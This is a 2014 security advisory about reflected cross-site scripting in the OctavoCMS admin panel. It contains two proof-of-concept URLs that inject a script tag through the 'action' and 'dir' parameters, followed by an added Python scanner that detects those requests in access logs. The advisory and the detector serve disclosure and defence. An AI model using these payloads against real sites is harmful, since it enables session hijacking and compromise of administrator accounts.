OctavoCMS Admin Panel Cross Site Scripting

2014-07-15T00:00:00
ID PACKETSTORM:127472
Type packetstorm
Reporter Hadi Arjmand
Modified 2014-07-15T00:00:00

Description

`# Title : OctavoCMS Admin Panel Cross Site Scripting  
#  
# Vendor : http://octavocms.com/  
#  
# Date : 2014.07.10  
#  
#================================  
#   
# Proof of concept :   
#  
# First, you should log in as admin ...  
#  
#  
# ( 1 ) :   
#  
# http://TARGET/admin/media/add.php?action="><script>alert(/XSS/)</script>  
#  
# ( 2 ) :  
#  
# http://TARGET/admin/pages/permissions.php?dir="><script>alert(/XSS/)</script>  
#  
#================================  
#  
# Demo : http://demo.octavocms.com  
#  
#================================  
# Credit : Hadi Arjmand , SeCTime.Ir  
#================================  
`
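
A defender-side check for the two requests listed above, as an added example that is not part of the original advisory: it scans web-server access-log lines for the `action` and `dir` parameters on those two admin scripts carrying quote or angle-bracket characters. The log lines are constructed, and both the combined log format and the idea that legitimate values never contain those characters are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script path suffix -> parameter, taken from the advisory's two PoC URLs.
WATCHED = {
    "/admin/media/add.php": "action",
    "/admin/pages/permissions.php": "dir",
}
# Characters able to close an HTML attribute or open a tag.
# Assumption: legitimate values of both parameters are plain names or paths.
BREAKOUT = re.compile(r"[\"'<>]")
# Request line inside a combined-format access-log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed log lines, not taken from a real server
    '198.51.100.7 - - [15/Jul/2014:10:01:02 +0000] "GET /admin/media/add.php?action=upload HTTP/1.1" 200 5120',
    '198.51.100.7 - - [15/Jul/2014:10:01:09 +0000] "GET /admin/media/add.php?action=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E HTTP/1.1" 200 5133',
    '198.51.100.7 - - [15/Jul/2014:10:02:30 +0000] "GET /cms/admin/pages/permissions.php?dir=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E HTTP/1.1" 200 4711',
    '198.51.100.7 - - [15/Jul/2014:10:03:00 +0000] "GET /admin/pages/permissions.php?dir=images/2014 HTTP/1.1" 200 4500',
]

def suspicious_value(line):
    """Return (path, param, decoded value) when a watched parameter on a
    watched script contains markup characters, otherwise None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    for suffix, param in WATCHED.items():
        # endswith() also covers installs below a sub-directory such as /cms/.
        if not url.path.endswith(suffix):
            continue
        # parse_qs percent-decodes, so %22%3E and a literal "> look the same.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if BREAKOUT.search(value):
                return url.path, param, value
    return None

def scan(lines):
    """Collect every hit from an iterable of access-log lines."""
    return [hit for hit in map(suspicious_value, lines) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Because both scripts sit behind the admin login, a hit usually means an authenticated administrator's browser was sent to a crafted link, so the Referer field of the same log entry is worth checking.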